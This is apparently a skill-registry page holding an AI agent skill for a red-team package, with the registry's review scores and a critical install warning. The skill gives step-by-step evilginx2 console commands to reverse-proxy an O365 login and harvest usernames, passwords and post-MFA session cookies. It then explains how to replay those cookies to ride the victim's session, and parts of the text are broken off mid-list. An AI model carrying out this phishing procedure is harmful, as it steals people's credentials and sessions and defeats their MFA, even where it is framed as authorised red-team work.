Author and deploy an evilginx2 phishlet to reverse-proxy a real login and capture the post-authentication session cookie, defeating MFA via session-token theft.
64
77%
Does it follow best practices?
Run evals on this skill
Adds up to 20 points to the overall score
View guide
Critical
Do not install without reviewing
Fix and improve this skill with Tessl
tessl review fix ./packages/decepticon/decepticon/skills/standard/phisher/evilginx2-proxy/SKILL.mdWhen the target enforces MFA, a static fake login page is useless — you need the authenticated session cookie. evilginx2 is an adversary-in-the-middle reverse proxy: the victim authenticates against the real site through your proxy, MFA included, and you capture the resulting session token for replay.
lookalike-domain).lure-deconfliction handshake COMPLETE.# DNS + cert: evilginx manages Let's Encrypt automatically
evilginx2 -p /opt/evilginx/phishlets
# in the evilginx console:
config domain login.acme-portal.example
config ipv4 <sandbox-ip>
phishlets hostname o365 login.acme-portal.example
phishlets enable o365
lures create o365
lures get-url 0 # -> the link you put in the GoPhish emailA phishlet is a YAML map of the target's auth hosts, the sub_filters
that rewrite the real domain to yours in responses, and the
auth_tokens (which cookies signal a completed login). Capture a
normal login in a proxy, identify the session cookie(s) the app sets
post-MFA, and list them under auth_tokens. Keep ACME challenge paths
off the proxied auth path.
# evilginx console: list captured sessions
sessions
sessions <id> # shows username, password, and the tokens (cookie JSON)Import the captured cookie JSON into a clean browser profile / a
Cookie header to ride the authenticated session without
re-triggering MFA.
Captured session → Credential node (type session-token) linked to
the User node with the lure id. Save the session JSON under
evidence/phisher/<id>-session.json. Note the estimated token TTL.
evidence/ +
the knowledge graph, never anywhere off-box.evilginx_disable_phishlet (phishlets disable o365) returns 502 on
a SOC stop request.31e1c8e
If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.